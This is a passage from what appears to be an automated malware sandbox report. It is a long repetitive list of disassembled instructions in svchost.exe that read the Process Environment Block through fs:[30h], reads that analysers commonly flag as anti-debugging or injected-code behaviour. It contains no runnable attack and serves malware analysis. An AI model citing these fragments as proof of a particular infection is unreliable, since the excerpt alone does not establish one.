            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
